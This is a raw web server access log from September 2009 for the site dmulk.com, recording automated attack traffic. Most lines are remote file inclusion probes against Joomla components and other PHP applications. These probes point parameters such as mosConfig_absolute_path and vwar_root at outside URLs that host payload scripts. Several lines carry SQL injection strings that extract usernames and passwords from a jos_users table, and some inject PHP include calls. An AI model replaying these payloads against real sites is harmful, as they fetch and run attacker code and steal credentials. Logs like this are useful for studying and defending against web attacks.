222.236.47.23 - - [07/Sep/2009:10:20:34 -0700] "GET /logs/access_080204.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [07/Sep/2009:10:20:34 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [07/Sep/2009:10:20:34 -0700] "GET /logs/access_071222.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:20:35 -0700] "GET /logs/access_090516.log/index.php?body=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:20:35 -0700] "GET /logs/index.php?body=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [07/Sep/2009:10:20:35 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [07/Sep/2009:10:20:35 -0700] "GET /logs/access_080204.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [07/Sep/2009:10:20:35 -0700] "GET /logs/access_071222.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [07/Sep/2009:10:20:36 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:20:36 -0700] "GET /index.php?body=http://aboutav.com//o/id1.txt??? HTTP/1.1" 200 19766 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:10:20:37 -0700] "GET /logs/access_080531.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.25.236.152 - - [07/Sep/2009:10:20:40 -0700] "GET /logs/access_090516.log%20%20/index.php?body=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.25.236.152 - - [07/Sep/2009:10:20:40 -0700] "GET /logs/access_090516.log%20%20/index.php?body=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [07/Sep/2009:10:20:44 -0700] "GET /logs/access_080204.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [07/Sep/2009:10:20:44 -0700] "GET /logs/access_090120.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [07/Sep/2009:10:20:46 -0700] "GET /logs/access_080204.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [07/Sep/2009:10:20:46 -0700] "GET /logs/access_090120.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.25.236.152 - - [07/Sep/2009:10:20:52 -0700] "GET /logs/access_080619.log%20%20/index.php?body=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.25.236.152 - - [07/Sep/2009:10:20:57 -0700] "GET /logs/access_080619.log%20%20/index.php?body=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:21:05 -0700] "GET /logs/access_090516.log%20%20/index.php?body=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:10:21:07 -0700] "GET /logs/access_070629.log HTTP/1.0" 200 29210 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.195.150.228 - - [07/Sep/2009:10:21:07 -0700] "GET /logs/access_081114.log////?_SERVER[DOCUMENT_ROOT]=http://shop.kbench.com/xml/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.195.150.228 - - [07/Sep/2009:10:21:08 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://shop.kbench.com/xml/ec.txt? HTTP/1.1" 200 19907 "-" "libwww-perl/5.803" "www.dmulk.com"
82.195.150.228 - - [07/Sep/2009:10:21:09 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://shop.kbench.com/xml/ec.txt? HTTP/1.1" 200 116211 "-" "libwww-perl/5.803" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:21:11 -0700] "GET /logs/access_090516.log/index.php?body=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:21:11 -0700] "GET /logs/index.php?body=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:21:11 -0700] "GET /index.php?body=http://aboutav.com//o/id1.txt??? HTTP/1.1" 200 19766 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:21:18 -0700] "GET /logs/access_080619.log%20%20/index.php?body=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:10:21:31 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:10:21:31 -0700] "GET /logs/access_080912.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:10:21:31 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:10:21:36 -0700] "GET /logs/access_090525.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:21:45 -0700] "GET /logs/access_090516.log%20%20/index.php?body=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:10:21:46 -0700] "GET /logs/access_090722.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:10:21:50 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:10:21:50 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:10:21:50 -0700] "GET /logs/access_080912.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:10:21:54 -0700] "GET /logs/access_090525.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:21:57 -0700] "GET /logs/access_080619.log%20%20/index.php?body=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.29.82.154 - - [07/Sep/2009:10:22:45 -0700] "GET /logs/access_081230.log%20//agendax/addevent.inc.php?agendax_path=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.92.156.53 - - [07/Sep/2009:10:22:51 -0700] "GET /logs/access_080601.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [07/Sep/2009:10:22:51 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [07/Sep/2009:10:22:51 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [07/Sep/2009:10:23:02 -0700] "GET /logs/access_090521.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:02 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:02 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:02 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:02 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:02 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:02 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [07/Sep/2009:10:23:02 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
64.157.4.42 - - [07/Sep/2009:10:23:03 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:03 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 200 19825 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:03 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 200 19825 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:03 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 200 19825 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:06 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:06 -0700] "GET /logs/access_080510.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:06 -0700] "GET /logs/access_090617.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:06 -0700] "GET /logs/access_080510.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:06 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:07 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 200 19825 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:23:07 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 200 19825 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [07/Sep/2009:10:23:26 -0700] "GET /logs/access_080313.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.254.195.7 - - [07/Sep/2009:10:23:36 -0700] "GET /logs/access_090515.log/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users--' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.254.195.7 - - [07/Sep/2009:10:23:36 -0700] "GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users--' HTTP/1.1" 200 19950 "-" "libwww-perl/5.805" "www.dmulk.com"
121.254.195.7 - - [07/Sep/2009:10:23:37 -0700] "GET /logs/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users--' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.254.195.7 - - [07/Sep/2009:10:23:37 -0700] "GET /logs/access_081211.log/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users--' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.23 - - [07/Sep/2009:10:23:50 -0700] "GET /logs/access_080313.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:24:46 -0700] "GET /logs/access_080313.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:24:46 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:24:46 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 200 19825 "-" "Mozilla/5.0" "www.dmulk.com"
211.75.220.49 - - [07/Sep/2009:10:24:53 -0700] "GET /logs/access_090408.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:24:56 -0700] "GET /logs/access_080313.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:24:56 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:24:57 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 200 19825 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:24:59 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:24:59 -0700] "GET /logs/access_080313.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:25:01 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 200 19825 "-" "Mozilla/5.0" "www.dmulk.com"
121.254.195.7 - - [07/Sep/2009:10:25:02 -0700] "GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users--' HTTP/1.1" 200 19950 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:10:25:17 -0700] "GET /logs/access_090213.log/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:10:25:17 -0700] "GET /logs/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:10:25:17 -0700] "GET /logs/access_080606.log/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:10:25:18 -0700] "GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users-- HTTP/1.1" 200 19938 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:10:25:35 -0700] "GET /logs/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:10:25:35 -0700] "GET /logs/access_090213.log/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:10:25:36 -0700] "GET /logs/access_080606.log/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:10:25:36 -0700] "GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users-- HTTP/1.1" 200 19938 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:10:26:00 -0700] "GET /logs/access_090213.log%20/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:10:26:03 -0700] "GET /logs/access_090213.log%20/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:10:26:39 -0700] "GET /logs/access_081201.log//naboard_pnr.php?skin=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:10:26:39 -0700] "GET /naboard_pnr.php?skin=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:10:26:40 -0700] "GET /logs//naboard_pnr.php?skin=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:10:26:42 -0700] "GET /logs/access_090525.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.18.27 - - [07/Sep/2009:10:27:35 -0700] "GET /admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.236.18.27 - - [07/Sep/2009:10:27:35 -0700] "GET /logs/access_090531.log//admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.236.18.27 - - [07/Sep/2009:10:27:35 -0700] "GET /logs//admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.236.18.27 - - [07/Sep/2009:10:27:35 -0700] "GET /logs/access_081114.log//admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:10:27:41 -0700] "GET /logs/access_090525.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:10:27:46 -0700] "GET /logs/access_090427.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
75.102.22.248 - - [07/Sep/2009:10:27:57 -0700] "GET /logs/access_080614.log%20//admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
75.102.22.248 - - [07/Sep/2009:10:27:57 -0700] "GET /logs/access_080422.log%20//admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
75.102.22.248 - - [07/Sep/2009:10:27:57 -0700] "GET /admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
75.102.22.248 - - [07/Sep/2009:10:27:57 -0700] "GET /logs//admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
75.102.22.248 - - [07/Sep/2009:10:27:57 -0700] "GET /logs/access_080819.log%20//admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
75.102.22.248 - - [07/Sep/2009:10:27:57 -0700] "GET /logs/access_080808.log%20//admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:10:28:00 -0700] "GET /logs/access_080526.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.102.22.248 - - [07/Sep/2009:10:28:24 -0700] "GET /logs/access_080201.log//admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
75.102.22.248 - - [07/Sep/2009:10:28:24 -0700] "GET /logs/access_090326.log//admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
75.102.22.248 - - [07/Sep/2009:10:28:24 -0700] "GET /logs/access_080111.log//admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
75.102.22.248 - - [07/Sep/2009:10:28:25 -0700] "GET /logs/access_090204.log//admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
